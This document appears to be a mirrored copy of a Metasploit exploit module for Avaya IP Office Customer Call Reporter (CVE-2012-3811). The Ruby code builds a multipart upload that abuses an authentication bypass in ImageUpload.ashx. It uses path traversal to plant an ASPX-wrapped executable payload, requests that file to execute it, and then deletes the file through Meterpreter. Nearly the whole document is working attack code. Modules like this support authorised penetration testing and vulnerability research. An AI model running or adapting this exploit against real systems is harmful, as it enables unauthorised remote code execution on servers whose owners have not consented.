Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb
19566 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'uri'

7


8
class MetasploitModule < Msf::Exploit::Remote

9
  Rank = ExcellentRanking

10


11
  include Msf::Exploit::Remote::HttpClient

12
  include Msf::Exploit::EXE

13


14
  def initialize

15
    super(

16
      'Name' => 'Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution',

17
      'Description' => %q{

18
          This module exploits an authentication bypass vulnerability on Avaya IP Office

19
        Customer Call Reporter, which allows a remote user to upload arbitrary files

20
        through the ImageUpload.ashx component. It can be abused to upload and execute

21
        arbitrary ASP .NET code. The vulnerability has been tested successfully on Avaya IP

22
        Office Customer Call Reporter 7.0.4.2 and 8.0.8.15 on Windows 2003 SP2.

23
      },

24
      'Author' => [

25
        'rgod <rgod[at]autistici.org>', # Vulnerability discovery

26
        'juan vazquez' # Metasploit module

27
      ],

28
      'Platform' => 'win',

29
      'References' => [

30
        [ 'CVE', '2012-3811' ],

31
        [ 'OSVDB', '83399' ],

32
        [ 'BID', '54225' ],

33
        [ 'URL', 'https://downloads.avaya.com/css/P8/documents/100164021' ],

34
        [ 'ZDI', '12-106' ]

35
      ],

36
      'Targets' => [

37
        [ 'Avaya IP Office Customer Call Reporter 7.0 and 8.0 / Microsoft Windows Server 2003 SP2', {} ],

38
      ],

39
      'DefaultTarget' => 0,

40
      'Privileged' => false,

41
      'DisclosureDate' => 'Jun 28 2012'

42
    )

43


44
    register_options(

45
      [

46
        OptString.new('TARGETURI', [true, 'The URI path of the Avaya CCR applications', '/'])

47
      ]

48
    )

49


50
    self.needs_cleanup = true

51
  end

52


53
  #

54
  # Remove the .aspx if we get a meterpreter.

55
  #

56
  def on_new_session(cli)

57
    if cli.type != 'meterpreter'

58
      print_error("Meterpreter not used. Please manually remove #{@payload_path}")

59
      return

60
    end

61


62
    cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")

63


64
    begin

65
      print_warning("Removing #{@payload_path}")

66
      cli.fs.file.rm(@payload_path)

67
      print_good("#{@payload_path} deleted")

68
    rescue ::Exception => e

69
      print_error("Unable to delete #{@payload_path}: #{e.message}")

70
    end

71
  end

72


73
  def exploit

74
    # Generate the ASPX containing the EXE containing the payload

75
    exe = generate_payload_exe

76
    aspx = Msf::Util::EXE.to_exe_aspx(exe)

77
    aspx_b64 = Rex::Text.encode_base64(aspx)

78


79
    uri_path = target_uri.path

80
    uri_path.path << "/" if uri_path[-1, 1] != "/"

81


82
    boundary = "---------------------------#{rand_text_alpha(36)}"

83


84
    my_data = "--#{boundary}\r\n"

85
    my_data << "Content-Disposition: form-data; name=\"RadUAG_fileName\"\r\n"

86
    my_data << "\r\n"

87
    my_data << "#{rand_text_alpha(rand(5) + 3)}.aspx\r\n"

88
    my_data << "--#{boundary}\r\n"

89
    my_data << "Content-Disposition: form-data; name=\"RadUAG_data\"\r\n"

90
    my_data << "\r\n"

91
    my_data << "#{aspx_b64}\r\n"

92
    my_data << "--#{boundary}\r\n"

93
    my_data << "Content-Disposition: form-data; name=\"RadUAG_targetFolder\"\r\n"

94
    my_data << "\r\n"

95
    my_data << "../../CCRWallboardMessageBroker/\r\n"

96
    my_data << "--#{boundary}\r\n"

97
    my_data << "Content-Disposition: form-data; name=\"RadUAG_position\"\r\n"

98
    my_data << "\r\n"

99
    my_data << "0\r\n"

100
    my_data << "--#{boundary}\r\n"

101
    my_data << "Content-Disposition: form-data; name=\"RadUAG_targetPhysicalFolder\"\r\n"

102
    my_data << "\r\n"

103
    my_data << "\r\n"

104
    my_data << "--#{boundary}\r\n"

105
    my_data << "Content-Disposition: form-data; name=\"RadUAG_overwriteExistingFiles\"\r\n"

106
    my_data << "\r\n"

107
    my_data << "True\r\n"

108
    my_data << "--#{boundary}\r\n"

109
    my_data << "Content-Disposition: form-data; name=\"RadUAG_finalFileRequest\"\r\n"

110
    my_data << "\r\n"

111
    my_data << "True\r\n"

112
    my_data << "--#{boundary}\r\n"

113
    my_data << "Content-Disposition: form-data; name=\"UploadImageType\"\r\n"

114
    my_data << "\r\n"

115
    my_data << "0\r\n"

116
    my_data << "--#{boundary}\r\n"

117
    my_data << "Content-Disposition: form-data; name=\"WallboardID\"\r\n"

118
    my_data << "\r\n"

119
    my_data << "0\r\n"

120
    my_data << "--#{boundary}--\r\n"

121


122
    #

123
    # UPLOAD

124
    #

125
    attack_url = uri_path + "CCRWebClient/Wallboard/ImageUpload.ashx"

126
    print_status("Uploading #{aspx_b64.length} bytes through #{attack_url}...")

127


128
    res = send_request_cgi({

129
      'uri' => attack_url,

130
      'method' => 'POST',

131
      'ctype' => "multipart/form-data; boundary=#{boundary}",

132
      'data' => my_data,

133
    }, 20)

134


135
    payload_url = ""

136
    @payload_path = ""

137
    if res and res.code == 200 and res.body =~ /"Key":"RadUAG_success","Value":true/

138
      print_good("Payload uploaded successfully")

139
    else

140
      print_error("Payload upload failed")

141
      return

142
    end

143


144
    # Retrieve info about the uploaded payload

145


146
    if res.body =~ /\{"Key":"RadUAG_filePath","Value":"(.*)"\},\{"Key":"RadUAG_associatedData/

147
      @payload_path = $1

148
      print_status("Payload stored on #{@payload_path}")

149
    else

150
      print_error("The payload file path couldn't be retrieved")

151
    end

152


153
    if res.body =~ /\[\{"Key":"UploadedImageURL","Value":"(.*)"\}\]/

154
      payload_url = URI($1).path

155
    else

156
      print_error("The payload URI couldn't be retrieved... Aborting!")

157
      return

158
    end

159


160
    #

161
    # EXECUTE

162
    #

163
    print_status("Executing #{payload_url}...")

164


165
    res = send_request_cgi({

166
      'uri' => payload_url,

167
      'method' => 'GET'

168
    }, 20)

169


170
    if (!res or (res and res.code != 200))

171
      print_error("Execution failed on #{payload_url} [No Response]")

172
      return

173
    end

174
  end

175
end

176


177